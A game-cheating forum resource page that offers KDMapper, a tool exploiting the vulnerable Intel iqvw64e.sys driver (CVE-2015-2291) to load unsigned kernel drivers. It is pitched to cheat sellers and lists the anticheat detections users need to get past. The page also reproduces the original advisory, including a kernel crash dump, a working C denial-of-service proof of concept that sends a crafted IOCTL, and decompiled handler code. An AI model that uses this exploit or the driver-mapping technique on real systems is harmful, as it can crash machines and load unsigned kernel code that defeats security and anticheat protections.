Resource icon

KDMapper - Manually Map Kernel Drivers CVE-2015-229 1803-2004 - TheCruZ - kdmapper

Login to enable download
Hexui Undetected CSGO Cheats Sinkicheat PUBG Cheat
KDMapper is a kernel driver manual mapper using a vulnerable Intel Driver, made by z175. It is used by hundreds of pay cheat providers and for good reason, it's super paste friendly.
  • Utilizes an embedded vulnerable Intel driver
  • Manually Maps your driver
  • Provides a simple command line interface
  • You just pass it 1 argument and you're driver is loaded
Learn everything you need to know in our Kernel Anticheat Tutorial

While z175 released the original KDMapper, there have been several compatability updates, this download will always be kept up to date with the latest, best version.

Exploiting Kernel Drivers
Kernel drivers are very common not just for hardware drivers, many different types of software utilize them. Driver security is very poor and there are many vulnerable drivers. The drivers expose functions to their usermode applications, to make development easy and cheap, they often expose too much or provide functionality that is too dangerous.

Any driver that takes data from usermode and does something with it in kernel is potentially vulnerable. Many have buffer overflows which can be leveraged, or even worse an arbitrary kernel write / execute vulnerability. These vulnerabilities can be exploited from usermode to execute your code, ideally providing a simple method to load your own driver.

But you can't just load your driver, you need to manually map it because it is not digitally signed. These vulnerable kernel drivers must have valid security certificates. By utilizing a valid & certified driver, you can manually map your unsigned driver without issue. Microsoft or the Certificate Authorities can decide to reject these certificates at any time, making them no longer work, but that is extremely rare.

This is where KDMapper comes in

KDMapper & CVE-2015-229
KDMapper comes embedded with the vulnerable iqvw64e.sys Intel Ethernet diagnostics driver. The driver is embedded as a byte array in intel_driver_resource.hpp

The driver was signed in 2013. The vulnerability was officially published in 2015 as CVE-2015-2291 with a severity score of 7.8.

CVE-2015-2291 Detail
IQVW32.sys before 1.3.1.0 and IQVW64.sys before 1.3.1.0 in the Intel Ethernet diagnostics driver for Windows allows local users to cause a denial of service or possibly execute arbitrary code with kernel privileges via a crafted (a) 0x80862013, (b) 0x8086200B, (c) 0x8086200F, or (d) 0x80862007 IOCTL call.
Amazingly it's certificate has not been revoked yet.

iqvw64e.sys
Code:
sha256            :     B2B2A748EA3754C90C83E1930336CF76C5DF9CBB1E3EEC175164BB01A54A4701
date            :     empty
language        :     English-United States
code-page        :     Unicode UTF-16    :      little endian
CompanyName        :     Intel Corporation
FileDescription    :     Intel(R) Network Adapter Diagnostic Driver
FileVersion        :     1.03.0.7 built by WinDDK
InternalName    :     iQVW64.SYS
LegalCopyright    :     Copyright (C) 2002-2013 Intel Corporation All Rights Reserved.
OriginalFilename:     iQVW64.SYS
ProductName        :     Intel(R) iQVW64.SYS
ProductVersion    :     1.03.0.7
iqvw64e.sys Main Intel Signature
1597955380651.png

But wait it's not valid after 2015! Wrong! Windows still loads it.

Counter Signer Symantec Time Signature
1597955388329.png


What happens in December 2020? Nothing! Microsoft will continue to load it as long as it is not revoked!

The vulnerability exists due to insufficient input buffer validation when the driver processes IOCTL codes 0x80862013, 0x8086200B, 0x8086200F, 0x80862007 using METHOD_NEITHER and due to insecure permissions allowing everyone read and write access to privileged use only functionality.

KdMapper utilizes IOCTL code 0x80862007 for arbitrary kernel execute
1597955394762.png


KDMapper is very easy to detect by anticheat - The driver is well documented, everyone knows what it is. But it's a good start to get you exposed to kernel hacking.

If you use KDMapper you must bypass these kernel detections
  • PiDDBCacheTable
  • MmUnloadedDrivers
  • System thread detection
  • System pool detection

KDMapper Resources
These are the original github repos, full credits to these gentlemen:
You can download each version here: KDMapper Download History

Misc
CVE-2015-2291 Resources

Continue Reading if you want more indepth information about CVE-2015-2291

  • Vendor: Intel
  • Product webpage: Intel | Data Center Solutions, IoT, and PC Innovation
  • Intel Network Adapter Diagnostic Driver IOCTL Handling Vulnerability
  • Affected product:
    • Network Driver for Windows XP
    • Network Driver for Windows 7
    • Network Driver for Windows 8
    • Network Driver for Windows 2008/R2
    • Network Driver for Windows 2012/R2
  • Affected version(s):
    • Intel(R) iQVW64.SYS v1.03.0.7
    • Intel(R) iQVW32.SYS v1.03.0.7
  • Affected Operating system:
    • Windows 7 SP1 (32/64-bit)
    • Windows XP SP3 (32-bit)
  • Date: 14/03/2015
  • Credits: Glafkos Charalambous
Disclosure Timeline:
  1. 10-06-2014: Vendor Notification
  2. 21-06-2014: Vendor Response/Feedback
  3. 08-08-2014: Vendor Response/Feedback
  4. 26-08-2014: Requesting Status/No Vendor Response
  5. 30-09-2014: Requesting Status/No Vendor Response
  6. 22-10-2014: Requesting Status/No Vendor Response
  7. 10-01-2015: Requesting Status/No Vendor Response
  8. 15-01-2015: Requesting Status/No Vendor Response
  9. 14-03-2015: CVE Requested
  10. 14-03-2015: CVE Assigned
  11. 14-03-2015: Public Disclosure
Description
A vulnerability in iqvw32.sys and iqvw64e.sys drivers has been discovered in Intel Network Adapter Driver.

The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes 0x80862013,
0x8086200B, 0x8086200F, 0x80862007 using METHOD_NEITHER and due to insecure permissions allowing everyone read and write access to privileged use only functionality. Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.

IOCTL 0x80862013
C++:
Microsoft (R) Windows Debugger Version 6.2.9200.20512 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

Opened \\.\pipe\com_2
Waiting to reconnect...
Connected to Windows 7 7601 x64 target at (Thu Feb 26 18:33:59.291 2015 (UTC + 2:00)), ptr64 TRUE
Kernel Debugger connection established.
Symbol search path is: srv*k:\symbols*http://msdl.microsoft.com/download/symbols;SRV*C:\Users\0x414141\AppData\Local\Temp\symbols\google*http://chromium-browser-symsrv.commondatastorage.googleapis.com;SRV*C:\Users\0x414141\AppData\Local\Temp\symbols\microsoft*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows 7 Kernel Version 7601 MP (1 procs) Free x64
Built by: 7601.18700.amd64fre.win7sp1_gdr.141211-1742
Machine Name:
Kernel base = 0xfffff800`03655000 PsLoadedModuleList = 0xfffff800`03898890
System Uptime: not available
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x0000003b
                       (0x00000000C0000005,0xFFFFF88005A0BFD2,0xFFFFF8800653A9C0,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

Connected to Windows 7 7601 x64 target at (Thu Feb 26 20:29:05.978 2015 (UTC + 2:00)), ptr64 TRUE
Loading Kernel Symbols, Loading User Symbols, Loading unloaded module list
....Unable to enumerate user-mode unloaded modules, Win32 error 0n30
Loading Wow64 Symbols
*******************************************************************************
*                        Bugcheck Analysis                                    *
*******************************************************************************

Use !analyze -v to get detailed debugging information.

BugCheck 3B, {c0000005, fffff88005a0bfd2, fffff8800653a9c0, 0}

*** ERROR: Module load completed but symbols could not be loaded for iqvw64e.sys
Followup: MachineOwner

C++:
nt!RtlpBreakWithStatusInstruction:
fffff800`036c3cb0 cc              int     3
3: kd> !analyze -v
*******************************************************************************
*                        Bugcheck Analysis                                    *
*******************************************************************************

SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the bugcheck
Arg2: fffff88005a0bfd2, Address of the instruction which caused the bugcheck
Arg3: fffff8800653a9c0, Address of the context record for the exception that caused the bugcheck
Arg4: 0000000000000000, zero.

Debugging Details:
------------------

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

FAULTING_IP:
iqvw64e+3fd2
fffff880`05a0bfd2 488b11          mov     rdx,qword ptr [rcx]

CONTEXT:  fffff8800653a9c0 -- (.cxr 0xfffff8800653a9c0)
rax=0000f88005a696d1 rbx=0000000000000001 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff88005a0bfd2 rsp=fffff8800653b3a0 rbp=fffff8800653bb60
r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0         nv up ei pl nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
iqvw64e+0x3fd2:
fffff880`05a0bfd2 488b11          mov     rdx,qword ptr [rcx] ds:002b:00000000`deadbeef=????????????????
Resetting default scope

DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT

BUGCHECK_STR:  0x3B

PROCESS_NAME:  ConsoleApplica

CURRENT_IRQL:  2

LAST_CONTROL_TRANSFER:  from fffff88005a091ac to fffff88005a0bfd2

STACK_TEXT:
fffff880`0653b3a0 fffff880`05a091ac : fffffa80`4aac7b00 00000000`00000001 fffffa80`4d1084d0 fffffa80`4d01e160 : iqvw64e+0x3fd2
fffff880`0653b8a0 fffff800`039e80f7 : 00000000`80862013 fffff880`0653bb60 fffffa80`4d1084d0 fffffa80`4d01e160 : iqvw64e+0x11ac
fffff880`0653b8d0 fffff800`039e8956 : fffff680`003b5ee8 00000000`00000000 00000000`00000000 00000000`00000000 : nt!IopXxxControlFile+0x607
fffff880`0653ba00 fffff800`036cb113 : 00000000`0021df01 0000007f`ffffffff 00000000`0021df00 00000980`00000000 : nt!NtDeviceIoControlFile+0x56
fffff880`0653ba70 00000000`73b02e09 : 00000000`73b02944 00000000`775a01b4 00000000`73b70023 00000000`00000246 : nt!KiSystemServiceCopyEnd+0x13
00000000`0021e898 00000000`73b02944 : 00000000`775a01b4 00000000`73b70023 00000000`00000246 00000000`001dff7c : wow64cpu!CpupSyscallStub+0x9
00000000`0021e8a0 00000000`73b7d286 : 00000000`00000000 00000000`73b01920 00000000`0021eb30 00000000`773decf1 : wow64cpu!DeviceIoctlFileFault+0x31
00000000`0021e960 00000000`73b7c69e : 00000000`00000000 00000000`00000000 00000000`73b74b10 00000000`7ffe0030 : wow64!RunCpuSimulation+0xa
00000000`0021e9b0 00000000`773f4966 : 00000000`003331f0 00000000`00000000 00000000`774e2670 00000000`774b5978 : wow64!Wow64LdrpInitialize+0x42a
00000000`0021ef00 00000000`773f1937 : 00000000`00000000 00000000`773f4071 00000000`0021f4b0 00000000`00000000 : ntdll!LdrpInitializeProcess+0x17e3
00000000`0021f3f0 00000000`773dc34e : 00000000`0021f4b0 00000000`00000000 00000000`7efdf000 00000000`00000000 : ntdll! ?? ::FNODOBFM::`string'+0x28ff0
00000000`0021f460 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!LdrInitializeThunk+0xe
FOLLOWUP_IP:
C++:
iqvw64e+3fd2
fffff880`05a0bfd2 488b11          mov     rdx,qword ptr [rcx]

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  iqvw64e+3fd2

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: iqvw64e

IMAGE_NAME:  iqvw64e.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  5284eac3

STACK_COMMAND:  .cxr 0xfffff8800653a9c0 ; kb

FAILURE_BUCKET_ID:  X64_0x3B_iqvw64e+3fd2

BUCKET_ID:  X64_0x3B_iqvw64e+3fd2

DOS Exploit Code
C++:
#include <windows.h>
#include <stdio.h>
#include <conio.h>

int main(int argc, char **argv)
{
    HANDLE   hDevice;
    DWORD    bret;
    char     szDevice[] = "\\\\.\\Nal";

    printf("--[ Intel Network Adapter Diagnostic Driver DoS ]--\n");

    printf("Opening handle to driver..\n");
    // CreateFile(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDispoition, dwFlagsAndAttributes, hTemplateFile)
    if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE)    {
        printf("Device %s succesfully opened!\n", szDevice);
        printf("\tHandle: %p\n", hDevice);
    }
    else
    {
        printf("Error: Error opening device %s\n", szDevice);
    }

    printf("\nPress any key to DoS..");
    _getch();

    bret = 0;
    // DeviceIoControl(hDevice, dwIoControlCode, lpInBuffer, nInBufferSize, lpOutBuffer, nOutBufferSize, lpBytesReturned, lpOverlapped)
    // Affected IOCTL codes: 0x80862013, 0x8086200B, 0x8086200F, 0x80862007
  
    if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))
    {
        printf("DeviceIoControl Error - bytes returned %#x\n", bret);
    }

    CloseHandle(hDevice);
    return 0;
}
C++:
__int64 __fastcall IOCTLHandler(__int64 a1, struct _IRP *IRequestPacket)
{
  _IO_STACK_LOCATION *IOStackLocation; // rax
  __int64 DeleteHandle; // rcx
  struct _IRP *IoRequestPacketCopy; // rdi
  __int64 v5; // rdx
  unsigned int result; // ebx

  IOStackLocation = IRequestPacket->Tail.Overlay.CurrentStackLocation;
  DeleteHandle = (__int64)IOStackLocation->Parameters.SetFile.DeleteHandle;
  IoRequestPacketCopy = IRequestPacket;
  v5 = IOStackLocation->Parameters.Read.ByteOffset.LowPart;
  if ( DeleteHandle )
  {
    switch ( (_DWORD)v5 )
    {
      case 0x80862007:
        result = IOCTL0x80862007(DeleteHandle); <-----------------
        break;
      case 0x8086200B:
        result = sub_11A60(DeleteHandle);
        break;
      case 0x8086200F:
        result = sub_11330(DeleteHandle);
        break;
      case 0x80862013:
        result = sub_13FA0();
        break;
      default:
        result = 0xC000000D;
        DebugPrintWrapper("Nal Windows DriverDeviceControl: Invalid IOCTL code 0x%0x\n");
        break;
    }
  }
  else
  {
    DebugPrintWrapper("NalDeviceControl: InputBuffer was NULL\n", v5);
    result = 0xC000000D;
  }
  IoRequestPacketCopy->IoStatus.Information = 0i64;
  IoRequestPacketCopy->IoStatus.Status = result;
  IofCompleteRequest(IoRequestPacketCopy, 0);
  return result;
}
Author
Rake
Downloads
31
Views
869
First release
Last update
Rating
0.00 star(s) 0 ratings

More resources from Rake

Latest updates

  1. Update by TheCruZ

    Now compatible with Windows versions 1803-2004
  2. Update by Dark7oveRR

    Now compatible with Windows versions 1809-1909
  3. Update by alxbrn

    Now compatible with Windows versions 1803-1903
Community Mods